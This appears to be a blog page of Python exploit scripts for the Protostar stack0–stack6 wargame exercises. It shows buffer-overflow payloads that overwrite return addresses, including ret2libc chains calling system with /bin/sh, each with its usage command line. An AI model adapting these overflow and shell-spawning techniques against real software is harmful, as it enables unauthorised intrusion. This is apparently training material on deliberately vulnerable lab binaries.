#(python /tmp/stack6.py;cat) | ./stack6
from struct import pack,unpack
 
p = lambda x: pack("<L",x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = "A"*80
payload += p(system)
payload += 'AAAA'
payload += p(binsh)
 
print payload


  1. 2017.08.02 22:53

    비밀댓글입니다

#(python /tmp/stack5.py;cat) | ./stack5
from struct import pack,unpack
 
p = lambda x: pack("<L",x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = "A"*76
payload += p(system)
payload += "AAAA"
payload += p(binsh)
 
print payload

  1. 2017.02.21 06:09

    비밀댓글입니다

  2. 2017.08.15 16:01

    비밀댓글입니다

#(python /tmp/stack4.py;cat) | ./stack4
from struct import pack,unpack
 
p = lambda x: pack("<L",x)
up = lambda x: unpack("<L",x)[0]

win_func = 0x080483f4

payload = "A"*76
payload += p(win_func)
 
print payload

#(python /tmp/stack3.py;cat) | ./stack3
from struct import pack,unpack
 
p = lambda x: pack("<L",x)
up = lambda x: unpack("<L",x)[0]

win_func = 0x08048424

payload = "A"*64
payload += p(win_func)
 
print payload


#export GREENIE=$(python /tmp/stack2.py)
#./stack2

payload = "A"*64
payload += "\x0a\x0d\x0a\x0d"
 
print payload


#./stack1 "$(python /tmp/stack1.py)"

payload = "A"*64
payload += "dcba"
 
print payload

#(python /tmp/stack0.py;cat) | ./stack0

payload = "A"*64
payload += "\xef\xbe\xad\xde"
 
print payload

+ Recent posts